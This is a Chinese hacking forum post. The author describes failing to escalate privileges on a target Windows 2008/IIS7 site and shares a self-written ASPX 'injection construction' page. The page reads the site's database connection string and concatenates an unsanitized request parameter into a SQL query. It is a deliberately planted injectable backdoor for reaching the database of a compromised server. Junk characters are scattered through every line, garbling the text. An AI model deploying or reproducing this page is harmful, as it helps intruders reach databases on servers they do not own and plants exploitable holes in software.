昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
: `3 ]3 R+ ^) U5 c7 c2 @其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
3 k# t. X3 T( E5 P1 P6 t3 W代码量不多,自己写个拉倒了。烦死了。
9 w6 V7 Z, ? u
0 I% ]( O- L" E$ q3 W
6 @, h4 O. v5 O% t. D4 G6 t& p<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">+ F% \0 l1 a7 i* Q/ X
<html xmlns="http://www.w3.org/1999/xhtml">6 b8 j" U' F$ g/ k
<head runat="server">3 l) I, B% j, M& A
<title>暗影aspx构造注射专用页面</title>
y' _8 }3 [) h( h5 |0 t</head>
& M& K3 ^7 a, |: v# J<body>, M! ^+ H& F; D
<form id="form1" runat="server">
h5 K$ U! G$ i8 a6 U+ s <div>
: B: \2 L' c' C* Z8 d' `* u7 o <script language="c#" runat="server">
# k, U2 J' M" j: Q8 [. \ & u8 G+ Z8 i! B. s5 r- k7 F; _9 z
void page_init(object sender, EventArgs e)
5 h }, ?3 W: c% G7 g# `9 d {
& q6 z. p& C5 a( c3 d% q( B 7 a% Q: I1 U' j' ^2 P8 X
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();) Y) \6 z% X9 A, l4 m8 h ?3 b
* ?! O- g. |2 u" ?2 K conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
! t9 t) a/ j/ j; M" P& i' n Y* d3 P conn.Open();8 `$ o$ H3 _8 H7 y$ S+ K8 b
' L/ ^, I3 g* o6 u- v string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
8 I) |' r. ^ p# n 7 a7 W: G( A3 ^/ A
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
& ]8 Y% a; r$ a2 b+ L8 j int x = command.ExecuteNonQuery();
) ~4 I/ ~" s1 W6 r9 t Response.Write(i+"\n");6 j& Z; W% s$ M* c: @
Response.Write(x);
' Q' u6 c2 V8 T conn.Close();: O# e$ d" e2 m8 P8 S* w) R- C
}
f1 l& n& Y9 x; f
7 k3 [8 U3 v/ c2 J5 L: B( g </script>* G; ^2 P0 d( U
</div>' V( [2 a4 m$ C1 K( \+ n/ b* [
</form>6 l' m/ V4 x# T# G
</body>
' m% h+ _5 F/ x</html>8 E: \1 F$ h' A% r3 t
|